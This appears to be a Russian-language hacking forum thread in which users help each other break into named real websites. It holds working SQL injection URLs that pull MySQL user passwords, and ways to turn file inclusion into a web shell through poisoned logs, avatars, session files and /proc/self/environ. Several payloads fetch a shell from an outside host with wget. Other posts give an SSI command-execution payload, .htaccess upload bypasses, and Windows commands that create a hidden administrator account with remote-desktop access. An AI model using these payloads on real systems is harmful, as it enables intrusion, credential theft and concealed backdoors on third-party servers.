это timestamp, запоминай время заливки файла переводи в unixtime и напиши брутер который который этот timestamp подберет, только вот из-за .htaccess наверное ничего не выйдет с шеллом
Насколько я знаю, шестизначный timestamp был еще в 1970 году.
А сейчас десять знаков в timestamp'e.

По крайней мере в 6-ой ветке был именно timestamp в качестве префикса

вобщем могу выполнять команды через php include+логи,как можно залить норм шелл?
<?php include("http://site/nstview.txt"); ?> не прокатило,wget curla нету(смотрел в /bin/)
если в reffer вставить норм шелл,прокатит?
_____
Попробовал через reffer не получилось.Все залил там был wget,лежал не в bin

<?php copy('http://site.gov/shell.txt', 'shell.php');?>

А в какой каталог он скопирует файл? Может надо полный путь указать?

скопирует в текущий каталог
если хотите в другое место, можно использовать абсолютный путь который начинается с "/"
ну или относительный "../../dir1/shell"

Проще тогда скопировать в /tmp/sess_26ac3fa833f07595698de0e73b8fa113.
Есть несколько плюсов:
1) 99% есть права на запись в диру
2) меньше палева, файл маскируется под сессию, и сидит там молча. =)

Потом инклудишь его index.php?page=/tmp/sess_26ac3fa833f07595698de0e73b8fa113
а потом уже перезаливаешь нормальный куда тебе нравится.

http://www.inderscience.com/browse/index.php?journalID=114'

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 30

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 38
Query Error:
SELECT coverImage FROM comanche.journalsMetadata WHERE sectionID=114\'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1


что можно сделать? надеюсь я не ошибся темой) :confused:

http://www.inderscience.com/browse/index.php?journalID=114'

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 30

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 38
Query Error:
SELECT coverImage FROM comanche.journalsMetadata WHERE sectionID=114\'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1


что можно сделать? надеюсь я не ошибся темой) :confused:

Крутить как слепую...
Например http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))>=100,1,0)-- выдает ошибку, значит наш ascii символ меньше...
пробуем http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))>=50,1,0)-- ошибки нет, значит символ больше, http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))>=52,1,0)-- максимальное значение на котором не выдает ошибку, проверяем http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))=52,1,0)-- ошибки нет, верно.
Т.е. первый ascii символ равен 52, значит версия мускуля 4-я.

Подробнее https://forum.antichat.ru/showpost.php?p=407227&postcount=3

Есть доступ к dle админке, версия 7.3.

Включил возможность добавлять файлы, но к новости так прикрепить и не смог.

Да и если бы получилось, то насколько я понимаю и проверил, папка /uploads/files/ защищена .htaccess:

<FilesMatch ".*">
Order allow,deny
Deny from all
</FilesMatch>

<FilesMatch "\.(avi|mp3|mp4|flv|swf|wmv)$|^$">
Order deny,allow
Allow from all
</FilesMatch>

Какие есть способы залить шел?

Есть доступ к бд, где таблицы dle (просмотр\запись, не root@mysql). Может можно там поменять пути на файлы?

Странно, но не могу найти, где добавлять файлы к новостям, в настройках разрешил добавлять файлы, указал расширения нужные, размер и т.п. А там где добавление новостей или их редактирование не могу найти, как всунуть атач. :)

Крутить как слепую...
Например http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))>=100,1,0)-- выдает ошибку, значит наш ascii символ меньше...
пробуем http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))>=50,1,0)-- ошибки нет, значит символ больше, http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))>=52,1,0)-- максимальное значение на котором не выдает ошибку, проверяем http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))=52,1,0)-- ошибки нет, верно.
Т.е. первый ascii символ равен 52, значит версия мускуля 4-я.

Подробнее https://forum.antichat.ru/showpost.php?p=407227&postcount=3
К чему такие громоздкие конструкции?
http://www.inderscience.com/browse/index.php?journalID=114+and+substring(version(),1, 1)=4/*
Этого достаточно...

К чему такие громоздкие конструкции?
http://www.inderscience.com/browse/index.php?journalID=114+and+substring(version(),1, 1)=4/*
Этого достаточно...

достаточно для определения версии не более, а буквы ты тоже будешь с числами сравнивать? а вот ascii код можно...

http://www.broowaha.com/profile.php?id=2434+ORDER+BY+18/* выдает ошибку,
http://www.broowaha.com/profile.php?id=2434+ORDER+BY+17/* срабатывает нормально. ОК,значит столбцов 17.
Делаю http://www.broowaha.com/profile.php?id=2434+UNION+SELECT+11111,22222,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17/*
но ничего не выводит. Пытался определить версию, методом, которым вы меня научили:
http://www.broowaha.com/profile.php?id=2434+AND+1=IF(ASCII(SUBSTRING((SELE CT+version()),1,1))%3E=52,1,0)/*
ответ таков:
Error, select query failed: 1064:You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT version()),1,1))>=52,1,0)/* AND tAuthors.status = 'activ
Как дальше действовать?

http://www.broowaha.com/profile.php?id=-2434+union+select+1,2,3,4,5,concat_ws(0x3a,version (),database(),user()),7,8,9,0,11,12,13,14,15,16,17/*

http://www.inderscience.com/browse/index.php?journalID=114'

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 30

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 38
Query Error:
SELECT coverImage FROM comanche.journalsMetadata WHERE sectionID=114\'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1


что можно сделать? надеюсь я не ошибся темой) :confused:
http://www.inderscience.com/browse/book.php?journalID=1001&year=2005&action=chapter&chapNum=23+union+select+1,2,3,unhex(hex(concat(fil e_priv,0x3a,user,0x3a,password))),5,unhex(hex(conc at(version(),0x3a,user(),0x3a,database()))),7+from +mysql.user--

nemaniak, fraIzer не стоит торопиться с выводами.

Вопрос: есть бажный PHP-скрипт, который использует значение переменной HTTP_HOST при генерации XML (то есть в самом XML это значение используется без какого-либо экранирования спец. символов) и потом его отдаёт на скачивание. Что можно провернуть в данном случае? Да, мы можем варьировать HTTP Host заголовком..но что это нам даёт?

если изменить поле Host в запросе то веб-сервер просто не узнает какому из виртуальных хостов пришел запрос. То есть до скрипта он уже вряд ли дойдет

http://www.broowaha.com/profile.php?id=2434+ORDER+BY+18/* выдает ошибку,
http://www.broowaha.com/profile.php?id=2434+ORDER+BY+17/* срабатывает нормально. ОК,значит столбцов 17.
Делаю http://www.broowaha.com/profile.php?id=2434+UNION+SELECT+11111,22222,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17/*
но ничего не выводит. Пытался определить версию, методом, которым вы меня научили:
http://www.broowaha.com/profile.php?id=2434+AND+1=IF(ASCII(SUBSTRING((SELE CT+version()),1,1))%3E=52,1,0)/*
ответ таков:
Error, select query failed: 1064:You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT version()),1,1))>=52,1,0)/* AND tAuthors.status = 'activ
Как дальше действовать?
Если у тебя есть обычная скуля.
Зачем мучать себя слепой?
Кстате скачай лучше SIPT 4.

http://www.inderscience.com/browse/book.php?journalID=1001&year=2005&action=chapter&chapNum=23+union+select+1,2,3,unhex(hex(concat(fil e_priv,0x3a,user,0x3a,password))),5,unhex(hex(conc at(version(),0x3a,user(),0x3a,database()))),7+from +mysql.user--

nemaniak, fraIzer не стоит торопиться с выводами.
Речь шла о конкретной скуле!!! Ты же показываешь совершенно другую!!!

достаточно для определения версии не более, а буквы ты тоже будешь с числами сравнивать? а вот ascii код можно...
Опять же на протяжении всего поста ты показывал ему как узнать версию, я и подмитил, что не к чему использовать такие громоздкие конструкции при определении версии(это не оправдывает себя), вот когда названия таблиц и столбцов подбирать начнешь, тогда да, но это совершенно другой вопрос, так или иначе то, что ты ему объяснил, это как вилами по воде, надеюсь понимаешь о чём я.

Если вам надо версию то )
&chapNum=-1+union+select+version() :)
И таким макаром

если изменить поле Host в запросе то веб-сервер просто не узнает какому из виртуальных хостов пришел запрос. То есть до скрипта он уже вряд ли дойдет
Только в случае, если виртуальные хосты host-based.
Уязвимость имеет место, то есть скрипт исполняется и в теле XML фигурирует значение Host-заголовка.

нашел скулю но там какая-та фильтрация
смотрим

видим 1 юзера
http://playthegame.od.ua/index.php?action=9&showuser=3058

видем юзера под ид 3057
http://playthegame.od.ua/index.php?action=9&showuser=3058-1

если делаем так то видим ошибку
http://extremission.com.ua/index.php?action=8

но при попытки
http://playthegame.od.ua/index.php?action=9&showuser=3058
дописать что-то типо union select и т.п. ничего не получаеться....
есть идеи*?

http://www.broowaha.com/profile.php?id=2434+ORDER+BY+18/* выдает ошибку,
http://www.broowaha.com/profile.php?id=2434+ORDER+BY+17/* срабатывает нормально. ОК,значит столбцов 17.
Делаю http://www.broowaha.com/profile.php?id=2434+UNION+SELECT+11111,22222,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17/*
но ничего не выводит. Пытался определить версию, методом, которым вы меня научили:
http://www.broowaha.com/profile.php?id=2434+AND+1=IF(ASCII(SUBSTRING((SELE CT+version()),1,1))%3E=52,1,0)/*
ответ таков:
Error, select query failed: 1064:You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT version()),1,1))>=52,1,0)/* AND tAuthors.status = 'activ
Как дальше действовать?

я тебе сказал крутить как слепую твой прошлый пример, т.к. именно в том параметре я других вариантов не видел, это не значит, что так надо крутить все скули. Нафига тебе эти сложности, если эту можно раскрутить как обычную, т.е. как написал попугай.

Опять же на протяжении всего поста ты показывал ему как узнать версию, я и подмитил, что не к чему использовать такие громоздкие конструкции при определении версии(это не оправдывает себя), вот когда названия таблиц и столбцов подбирать начнешь, тогда да, но это совершенно другой вопрос, так или иначе то, что ты ему объяснил, это как вилами по воде, надеюсь понимаешь о чём я.

Ну это уже конкретика, естественно, что у каждого свои трики, которыми он пользуется, для меня лично легче сразу написать всю конструкцию с ascii(), а потом поменять version() например на user(), чем писать сначала без ascii() а потом ее дописывать... а вообще это все хрень, так все равно никто вручную все базы, столбцы, данные и т.д. перебирать не будет...

нашел скулю но там какая-та фильтрация
смотрим

видим 1 юзера
http://playthegame.od.ua/index.php?action=9&showuser=3058

видем юзера под ид 3057
http://playthegame.od.ua/index.php?action=9&showuser=3058-1

если делаем так то видим ошибку
http://extremission.com.ua/index.php?action=8

но при попытки
http://playthegame.od.ua/index.php?action=9&showuser=3058
дописать что-то типо union select и т.п. ничего не получаеться....
есть идеи*?
ne nadoelo? Nu prob'esh ty golovoy stenku. chto ty budesh delat' v sosednej kamere?

Есть доступ к бд, где таблицы dle (просмотр\запись, не root@mysql). Может можно там поменять пути на файлы?

Странно, но не могу найти, где добавлять файлы к новостям, в настройках разрешил добавлять файлы, указал расширения нужные, размер и т.п. А там где добавление новостей или их редактирование не могу найти, как всунуть атач. :)

.php перед flv убирается движком..

Удалось залить файл ......../uploads/files/1250379992_functions.phtml.flv

но он не интрепретируется, а скачивается...

Какие ещё есть варианты залить шел через движок дле 7.3 версии?

Попробуй залить .shtml-файл вот с таким <!--#exec cmd="$QUERY_STRING_UNESCAPED"-->

нашел скулю но там какая-та фильтрация
смотрим

видим 1 юзера
http://playthegame.od.ua/index.php?action=9&showuser=3058

видем юзера под ид 3057
http://playthegame.od.ua/index.php?action=9&showuser=3058-1

если делаем так то видим ошибку
http://extremission.com.ua/index.php?action=8

но при попытки
http://playthegame.od.ua/index.php?action=9&showuser=3058
дописать что-то типо union select и т.п. ничего не получаеться....
есть идеи*?
Может быть intval();
Хотя &showuser=3058-1 работает.
пробуй
unIoN+SeLecT
Может быть просто фильтр.

Смотрите есть сайт с PHP-inj

http://site.ru/module/index.php?p=index

Ну понятно что в $_GET[p] и переносится путь до файла.
Если указываю не верный путь то пишет что фаил не найден, значит стоит проверка на то есть ли фаил...
Открыл config.php начего не написалось так как нет вывода...

Также есть форум на vBulletin ну попробовал открыть индекс
../forum/index мне написалось что пути до конфгов не найдены и уже видел еррор, тоесть ошибки не отключены

Из ошибки видно что апач стоит на винде...
попытки загрузить внешку типо
http://site.ru/module/index.php?p=http://forum.antichat.ru/newreply
Закнончились неудачей типо фаил не найден, FTP метод тож не прошёл...


Подскажите что можно сделать?

Может так как система на винде, можно чтолить интересного накопать? Хотя не могу оборвать расширение которое присваевается (.php)

Может скрипт прикручивает расширение файлу? Попробуй поэксперементировать с нулл-байтом.

обрезать расширение нул-байтом и инклудить логи/картинки/сессии/environ/etc
попробовать php://input

Spyder, я от нечего делать рассписал эти методы залития шелла через LFI.

Скорее всего директива allow_url_include = off. Т.е. проинклюдить удаленно не удастся.

Вариант #0. Можно инклюдить логи, но надо знать путь к ним. Есть специальная тема со списком путей к httpd.conf. Не нашёл пути - пропускай этот пункт. Там есть директива TransferLog, в которой находится абсолютный путь к логам. Открой index.php?<?php system('wget http://mysite.ru/shell.txt -O shell.php');?>
После этого в лог-файл запишется PHP код, тебе останется только проинклюдить лог-файл.

Вариант #1. Создай картинку, впиши в конец файла <?php system('wget http://mysite.ru/shell.txt -O shell.php');?>, только не блокнотом, а любым хекс-редактором. Реганись на форуме, залей себе эту картинку в кач-ве аватары, или фотки, etc. Потом инклюдь эту картинку http://site.ru/module/index.php?p=../forum/avatars/avatar28082.gif
И открывай файлик shell.

Вариант #2. Допустим, на сайте есть код, вида
session_start();
$_SESSION['id']=$_GET['value'];

Тогда открывай file.php?value=<?php system('wget http://mysite.ru/shell.txt -O shell.php');?>

Дальше в куки сайта смотри PHPSESSID и инклюдь /tmp/sess_PHPSESSID
Путь к сохраниению сессий может быть иной...

Вариант #3. Еще есть вариант с /proc/self/environ. Если проинклюдив его, ты получаешь что-то вида DOCUMENT_ROOT=/var/www GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2a d7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.site.ru/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fpr oc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?p=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fs elf%2Fenviron SCRIPT_FILENAME=/var/www SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.site.ru SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.site.ru Port 80Считай, что шелл у тебя есть. Используй любую HTTP-тулзу, н.п. InetCrack и измени отправляемый заголовк User-Agent на <?php system('wget http://mysite.ru/shell.txt -O shell.php');?>.

ЗЫ: system() может не работать, используй exec();
wget может не работать, используй lynx, fetch, curl...

есть фтп доступ, файлы заливать можно, заливаю php шелл - он его показывает как 404
http://gyazo.com/3af28465b55431dfd3083ab47392f4ab.png
На сервере файлы с расширением .ASP Какой нужно шелл залить , или что я делаю не так?
Ну ты то PHP шелл :)
Может там он удаляет PHP файлы все.
ищи шелл на ASP

DeluxeS загляни сюда http://forum.antichat.ru/thread103576.html

net user user pass /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited

А для того, чтобы не запалили, надо сделать в реестре такую фичу:
HKLM/SOFTWARE/Microsoft/Windows NT/Current Version/Winlogon/SpecialAccounts/Userlist/
Создаёшь там параметр с типом REG_DWORD, именем своего юзера и значением 0.

DeluxeS, рес куда ты хочешь залить свой шелл случайно не едушка?

Задаюсь я этим вопросом уже не впервый раз =\
Я проинклюдил /proc/self/environ, но инклюдящий файл не PHP, a CGI. PHP команды, разумеется, не пашут, так что же можно сделать?


//Как я понял мне нужен аналог system'a на perl'e, но может я не прав.

Задаюсь я этим вопросом уже не впервый раз =\
Я проинклюдил /proc/self/environ, но инклюдящий файл не PHP, a CGI. PHP команды, разумеется, не пашут, так что же можно сделать?


//Как я понял мне нужен аналог system'a на perl'e, но может я не прав.
все зависит от того на каком языке написана cgi
для перла

Perl's exec(), and system() functions as well as the backtick operator can be used to execute system commands.

так же не факт что они там вообще eval-ятся.

geezer.code
Но как обрамить код и прочее? Т.е. можешь привести пример (User-Agent: blablabla), а мне сейчас негде проверить, т.к. на этом сайте была просто читалка, но встречал такое очень часто.

geezer.code
Но как обрамить код и прочее? Т.е. можешь привести пример (User-Agent: blablabla), а мне сейчас негде проверить, т.к. на этом сайте была просто читалка, но встречал такое очень часто.
я не перл-программер.
бегло пробежался по гуглу.
и поспрошал на канале у знатоков.
Перл не страдает таким извращением как пхп, и без "особых условий"
LFI как в пхп, провести нельзя.

Есть инклюд
http://www.lauralee.com/index.cgi?page=../../../../../../../proc/self/environ%00
При подмене заголовка User-Agent, в сорсах
ASPSERVER=aspvw.ahp.ftl.affinity.com DOCUMENT_ROOT=/nfs/cust/1/04/06/560401/web GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=*/* HTTP_HOST=www.lauralee.com HTTP_USER_AGENT=<?php echo "hello";?> ICSPATH=/usr/local/affinity/etc/lib/mivavm/icsdata MvCONFIG_COMMERCE_AUTHNET=/usr/local/affinity/etc/lib/mivavm/authnet.so MvCONFIG_COMMERCE_AuthorizeNet=/usr/local/affinity/etc/lib/mivavm/authnet.so MvCONFIG_COMMERCE_CYBERCASH=/usr/local/affinity/etc/lib/mivavm/cybercash.so MvCONFIG_COMMERCE_GlobalCommerce=/usr/local/affinity/etc/lib/mivavm/globcomm.so MvCONFIG_COMMERCE_ICS2=/usr/local/affinity/etc/lib/mivavm/ics2.so MvCONFIG_COMMERCE_LINKPOINT=/usr/local/affinity/etc/lib/mivavm/linkpoint.so MvCONFIG_COMMERCE_Paradata=/usr/local/affinity/etc/lib/mivavm/paradata.so MvCONFIG_COMMERCE_PNTransact=/usr/local/affinity/etc/lib/mivavm/pnt.so MvCONFIG_DIR_BUILTIN=/usr/local/affinity/etc/lib/mivavm/builtin MvCONFIG_DIR_CA=/usr/local/affinity/etc/lib/mivavm/certs MvCONFIG_DIR_CRYPTO=/lib/libcrypto.so.2 MvCONFIG_DIR_OPENSSL=/lib/libssl.so.2 MvCONFIG_FLAGS_SECURITY=5 MvCONFIG_TIMEOUT_GLOBAL=600 PATH=/usr/bin:/bin:/usr/local/bin QUERY_STRING=page=../../../../../../../proc/self/environ%00 REMOTE_ADDR=79.124.220.206 REMOTE_PORT=2305 REQUEST_METHOD=GET REQUEST_URI=/index.cgi?page=../../../../../../../proc/self/environ%00 SCRIPT_FILENAME=/nfs/cust/1/04/06/560401/web/index.cgi SCRIPT_NAME=/index.cgi SERVER_ADDR=172.28.2.161 SERVER_ADMIN=webmaster@lauralee.com SERVER_NAME=www.lauralee.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.1 SERVER_SIGNATURE= SERVER_SOFTWARE=Apache REMOTE_HOST=79.124.220.206 CSF_CLUSTERNAME=web MvCONFIG_DIR_MIVA=/nfs/cust/1/04/06/560401/web MvCONFIG_DIR_DATA=/nfs/cust/1/04/06/560401/web/htsdata
Т.е. PHP-код не интерпретируется. Можно ли, и если да, то как, обойти это?

mailbrush

http://www.lauralee.com/index.cgi?page=./index.cgi%00

У меня с перлом хреново, но PHP код там точно исполняться не будет, можешь быть уверен

И инклуд тут тоже абсолютно непричём

о_О, точно, спасибо :) Вообще как-то не обратил внимания на расширение .cgi.
ЗЫ: А предыдущий вопрос от Tigger'a был точно такой же :)

есть cgi шеллы

geezer.code
Но как обрамить код и прочее? Т.е. можешь привести пример (User-Agent: blablabla), а мне сейчас негде проверить, т.к. на этом сайте была просто читалка, но встречал такое очень часто.
выполнение PERL-кода ты получишь только если переменная попадет в do или eval, но такого почти никогда не бывает. Если используется open то иногда можно выполнять системные команды или писать в файлы
в случае mailbrush в коде index.cgi было так:
open (PAGE, "< $page");знак '<' обозначает открыть файл для чтения, то есть уязвимость - простая читалка файлов.
если бы было так:
open (PAGE, $page);то тут уже можно выполнять команды, примерно так: ?page=| ls -la
знак конвеера - запустить команду, знак '>' - открыть для записи.

какие атаки можно провести черех хедер запроса ? если его поля нефильтруються ?

Все те же, что и GET, POST методом.
Всё зависит от кода.

mailbrush

Там, в index.cgi, есть инфа для коннекта к БД, причем возможно удаленно приконнектиться. Попробуй это проработать + поискать админку.

Привет. Вот такой запрос выполняется:

http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,column_name,11, 12,13+from+information_schema.columns+where+table_ name=char%28100,117,98,119,105,107,105,95,117,115, 101,114%29+limit+1,1/*

А так, почему то ошибка, наверно что-то фильтруется:

http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,name,10,11,12,13+ from+dubwiki_user/*

Привет. Вот такой запрос выполняется:



А так, почему то ошибка, наверно что-то фильтруется:

А тогда в 101 раз скажу - для начала вот так:

http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,table_schema,10,1 1,12,13+from+information_schema.columns+where+tabl e_name=0x64756277696b695f75736572/*


допустим выдаст нечто вроде subco_db

потом так:


http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,name,10,11,12,13+ from+subco_db.dubwiki_user/*

В той таблице нету записей

http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,10,11,(select+c ount(*)+from+dubwiki_user),13+from+information_sch ema.tables--+

crawen_s
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,column_name,11, 12,13+from+information_schema.columns+where+table_ name=0x64756277696B695F75736572+limit+1,7/*


id
name
email
password
homepage
creationts


А вообще:
Может быть другая DB. Как проверять написал Pashkela
В данной таблице нету записей
...WHERE TABLE_NAME=<hex>

...

))) не в то поле смотрел:))) Пора баиньки

Вообще бред какой-то:


http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,count(*),11,12, 13+from+dubwiki_user--+


вот так должен выводить ноль, если записей нет, ошибки нет, но просто пусто, великолепно. Хз чо такое

А вот с этой таблы выводит:


http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,count(*),11,12, 13+from+dubwiki_version--+


и показывает кол-во 7. У меня вывод только один - покрашенная табла в БД, а именно dubwiki_user, т.е. сломанная, нарушенны какие-то связи и т.д. Других вариантов не вижу чото.

Старшие придут, может чо поумнее скажут

PS: Ну да, остальные dubwiki в той же БД:


http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,table_schema,11 ,12,13+from+information_schema.columns+where+table _name=0x64756277696b695f70616765--+


но из них инфо спокойно читается, на тоже как-то странно:))


http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,concat_ws(id,na me,currentversion),11,12,13+from+dubwiki_page+limi t+1,1--+


какой-то мегохоцер БД строил:)

... У меня вывод только один - покрашенная табла в БД, а именно dubwiki_user, т.е. сломанная, нарушенны какие-то связи и т.д. Других вариантов не вижу чото.

Старшие придут, может чо поумнее скажут
..
а вы как бы не предполагали что вы не туда выводите результат запроса? Просто в коде для 10-ого поля стоит проверка, если 0 то ничего не выводится вообще. А если выводить например в 12-ое поле то отлично видно что в той табличке просто ничего нет
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,10,11,count(*), 13+from+dubwiki_user--+

^
||
Вот именноhttp://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,0x30,11,12,13+--+
какие тут связи нарушены могут быть? нейронные? во что покрашена табла? в какой цвет? и собственно какая табла? в последнем примере ничего странного не обнаружил, мож ты просто в concat_ws разделитель забыл поставить?

http://www.alcodream.ru/categoryID/80+UNION+SELECT%20group_concat(table_name)%20from% 20information_schema.tables%20--

Как вот сдесь сделать вывод просто если 80 заменить на 80-80 или там на 2923939 или "-" подставить скиыдывает на индекс.пхп

...

http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,concat_ws(id,na me,currentversion),11,12,13+from+dubwiki_page+limi t+1,1--+


какой-то мегохоцер БД строил:)
Какой то мегохоцер не умеет юзать concat_ws

Наибанальнейший вопрос:

Допустим у меня есть сканер уязвимостей, он находит N колличество уязвимостей, а как мне их испольховать?

Если уже где-то это было прошу скинуть ссылку на этот топик.

http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,concat_ws(id,na me,currentversion),11,12,13+from+dubwiki_page+limi t+1,1--+


какой-то мегохоцер БД строил:)
concat_ws(0x3a,column,column) мегохоцер :(

6@llT0
Копируеш тип уязвимости и в гугл искать сплоит или хотяби тему на форуме www.sevuritylab.ru, www.securityfocus.com, etc.

Наибанальнейший вопрос:

Допустим у меня есть сканер уязвимостей, он находит N колличество уязвимостей, а как мне их испольховать?

Если уже где-то это было прошу скинуть ссылку на этот топик.
каких именно уязвимостей :o их не две штуки что бы экстросенсорно догадаться

Ребят, так таблица dubwiki_user не доступна или как ????

каких именно уязвимостей :o их не две штуки что бы экстросенсорно догадаться

Ну он ещё не досканировал...
А вообше я в этом нуб, нубом вот и пытаюсь хоть как-то разобраться=)

И подскажите какой нибудь хорший скан=)

мозги и голова, хороший сканер :confused:
и пытайся разобраться с разделов "Статьи" и "Избранное".

Ребят, так таблица dubwiki_user не доступна или как ????


Доступна, но там ноль записей, пусто там, сравни вывод:


http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,10,11,count(*), 13+from+dubwiki_user--+


и


http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+

it's my, попробуй passthru($_GET[cmd]);

Апострофы поставь вокруг cmd

там винда :( я затупил просто

где в IIS можно найти файл как у апача httpd.conf?

Файлы конфигурации служб IIS7.0 по умолчанию расположены в папке Windows\System32\Inetsrv.

* Applicationhost.config
* Global web.config
* Machine.config
* Site web.config
* App web.config

в IIS6 таких файлов нет, преполагаю что настройки в реестре =(

Я оборвал запрос с помощью %23 Но не могу ничего использовать до %23
Тоесть допустим воткнуть конструукцию id=5+and+1=1%23
Помойму он пробелы не хочет виспринимать пробовал (+ %20 %09 %0a /**/ %0d %2b)

Выделил те при которых пишет "Bad Request (Invalid URL)" при остольных SQL error
При /**/ выводится просто "Bad Request

попробовал id=6-1%23 SQL error

Byrger

+--+
/*
#

Пробуй без пробела,+...
А может там нету иньекции?
А может там запрет на and, union, select, etc?

всем прив. проблема в следующем - есть возможность лить на сайт файлы через скулю, но папка на запись, доступная из веба, в одном экземпляре ( по крайней мере я только одну нашел). но файлы с расширением пхп в этой папке не исполняются( выдает интернал сервер еррор). как мона получить шелл в данном случае?
з.ы. пхтмл пробовал - не исполняется как пхп

Если в .htaccess ЗАПРЕТ на php, а не разрешение на html,etc, то можно попробывать залить perl шелл. Если же не нет, то через ReverseIP смотри соседние сайты и пробуй залить на них.

Tiggerто можно попробывать залить perl шелл.

Не выполнится, нужны будут права на выполнение

Byrger

Пробуй без пробела,+...
А может там нету иньекции?
А может там запрет на and, union, select, etc?

Оборвать то я строку смог а вот инъекцию туда вставить нет
Она там есть так как результат что id=5%23
Один с id=5%23lalalal

А вот перед %23 Ничего не получается вставить : (

Файлы конфигурации служб IIS7.0 по умолчанию расположены в папке Windows\System32\Inetsrv.

* Applicationhost.config
* Global web.config
* Machine.config
* Site web.config
* App web.config

в IIS6 таких файлов нет, преполагаю что настройки в реестре =(
я почитал интернеты, оказывается там все настройки в ДНС :(

Оборвать то я строку смог а вот инъекцию туда вставить нет
Она там есть так как результат что id=5%23
Один с id=5%23lalalal

А вот перед %23 Ничего не получается вставить : (
Я конечно может чего то не понимаю...
но судя по описанию там нет скули,нужна еще одна проверка на выполнение SQL кода
допустим при id=5 у тебя выводит одну страницу то и при id=6-1 и id=4+1 или при id=5*1 должно вывести туже самую страницу. Если так оно тогда скуль!

Существуют ли способы обхода фильтрации htmlspecialchars()?

Существуют ли способы обхода фильтрации htmlspecialchars()?
вряд ли существует

Есть сервак Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1

на запросы типа
(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.T ABLES)--
пишет mofo Incorrect syntax near the keyword 'TOP'.

@@version--
(select db_name())--
(select system_user)--

Выполняются без проблем. Как обойти?

